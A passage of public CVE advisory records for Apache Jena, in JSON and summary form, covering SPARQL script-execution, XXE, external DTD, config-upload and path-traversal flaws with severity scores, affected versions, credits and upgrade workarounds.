"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-32200",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T19:41:36.847404Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T19:42:49.706Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "s3gundo of Alibaba"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\u003cbr\u003e\u003cp\u003eThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\u003c/p\u003e"
}
],
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\nThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\n\n"
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-12T07:49:55.432Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"related"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of execution in script engine expressions.",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-32200",
"datePublished": "2023-07-12T07:49:55.432Z",
"dateReserved": "2023-05-04T12:49:34.610Z",
"dateUpdated": "2024-10-07T19:42:49.706Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22665 (GCVE-0-2023-22665)
Vulnerability from cvelistv5 – Published: 2023-04-25 06:44 – Updated: 2025-02-13 16:44
VLAI?
Title
Apache Jena: Exposure of arbitrary execution in script engine expressions.
Summary
There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.
Severity ?
No CVSS data available.
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 4.7.0
(semver)
|
Credits
L3yx of Syclover Security Team
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:13:49.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.7.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L3yx of Syclover Security Team"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-11T20:06:23.134Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of arbitrary execution in script engine expressions.",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-22665",
"datePublished": "2023-04-25T06:44:21.516Z",
"dateReserved": "2023-01-05T14:41:04.515Z",
"dateUpdated": "2025-02-13T16:44:03.940Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-28890 (GCVE-0-2022-28890)
Vulnerability from cvelistv5 – Published: 2022-05-05 08:40 – Updated: 2024-08-03 06:10
VLAI?
Title
Processing external DTDs
Summary
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
Severity ?
No CVSS data available.
CWE
- XML External DTD vulnerability
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
Apache Jena , ≤ 4.4.0
(custom)
|
Credits
Apache Jena would like to thank Feras Daragma, Avishag Shapira & Amit Laish (GE Digital, Cyber Security Lab) for their report.
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:10:56.881Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.4.0",
"status": "affected",
"version": "Apache Jena",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
],
"metrics": [
{
"other": {
"content": {
"other": "medium"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External DTD vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-05T08:40:09",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Processing external DTDs",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2022-28890",
"STATE": "PUBLIC",
"TITLE": "Processing external DTDs"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "Apache Jena",
"version_value": "4.4.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "medium"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External DTD vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878",
"refsource": "MISC",
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2022-28890",
"datePublished": "2022-05-05T08:40:09",
"dateReserved": "2022-04-09T00:00:00",
"dateUpdated": "2024-08-03T06:10:56.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-39239 (GCVE-0-2021-39239)
Vulnerability from cvelistv5 – Published: 2021-09-16 14:40 – Updated: 2024-08-04 02:06
VLAI?
Title
XML External Entity (XXE) vulnerability
Summary
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
Severity ?
No CVSS data available.
CWE
- XML External Entity (XXE) vulnerability
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
unspecified , < 4.1.0
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:06:40.799Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "4.1.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
],
"metrics": [
{
"other": {
"content": {
"other": "high"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External Entity (XXE) vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-09-21T09:06:18",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "XML External Entity (XXE) vulnerability",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-39239",
"STATE": "PUBLIC",
"TITLE": "XML External Entity (XXE) vulnerability"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "4.1.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "high"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External Entity (XXE) vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E",
"refsource": "MISC",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d@%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45@%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d@%3Cdev.jena.apache.org%3E"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2021-39239",
"datePublished": "2021-09-16T14:40:20",
"dateReserved": "2021-08-17T00:00:00",
"dateUpdated": "2024-08-04T02:06:40.799Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-50151 (GCVE-0-2025-50151)
Vulnerability from nvd – Published: 2025-07-21 09:32 – Updated: 2025-11-04 21:11
VLAI?
Title
Apache Jena: Configuration files uploaded by administrative users are not check properly
Summary
File access paths in configuration files uploaded by users with administrator access are not validated.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.
Severity ?
No CVSS data available.
CWE
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 5.4.0
(semver)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-50151",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:40:14.417556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:41:06.294Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:34.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eFile access paths in configuration files uploaded by users with administrator access are not validated.\u003c/div\u003e\u003cdiv\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.\u003c/p\u003e\u003cbr\u003e\u003c/div\u003e"
}
],
"value": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:32:30.334Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Configuration files uploaded by administrative users are not check properly",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-50151",
"datePublished": "2025-07-21T09:32:30.334Z",
"dateReserved": "2025-06-13T16:13:26.895Z",
"dateUpdated": "2025-11-04T21:11:34.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-49656 (GCVE-0-2025-49656)
Vulnerability from nvd – Published: 2025-07-21 09:30 – Updated: 2025-11-04 21:11
VLAI?
Title
Apache Jena: Administrative users can create files outside the server directory space via the admin UI
Summary
Users with administrator access can create databases files outside the files area of the Fuseki server.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 5.4.0
(semver)
|
Credits
Noriaki Iwasaki; Cyber Defense Institute, Inc
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-49656",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:46:28.661133Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:47:08.462Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:14.792Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Noriaki Iwasaki; Cyber Defense Institute, Inc"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUsers with administrator access can create databases files outside the files area of the Fuseki server.\u003c/p\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:30:32.715Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Administrative users can create files outside the server directory space via the admin UI",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-49656",
"datePublished": "2025-07-21T09:30:32.715Z",
"dateReserved": "2025-06-09T16:47:05.868Z",
"dateUpdated": "2025-11-04T21:11:14.792Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-32200 (GCVE-0-2023-32200)
Vulnerability from nvd – Published: 2023-07-12 07:49 – Updated: 2024-10-07 19:42
VLAI?
Title
Apache Jena: Exposure of execution in script engine expressions.
Summary
There is insufficient restrictions of called script functions in Apache Jena
versions 4.8.0 and earlier. It allows a
remote user to execute javascript via a SPARQL query.
This issue affects Apache Jena: from 3.7.0 through 4.8.0.
Severity ?
No CVSS data available.
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
3.7.0 , ≤ 4.8.0
(semver)
|
Credits
s3gundo of Alibaba
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:10:23.901Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"related",
"x_transferred"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jena",
"vendor": "apache",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-32200",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T19:41:36.847404Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T19:42:49.706Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "s3gundo of Alibaba"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\u003cbr\u003e\u003cp\u003eThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\u003c/p\u003e"
}
],
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\nThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\n\n"
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
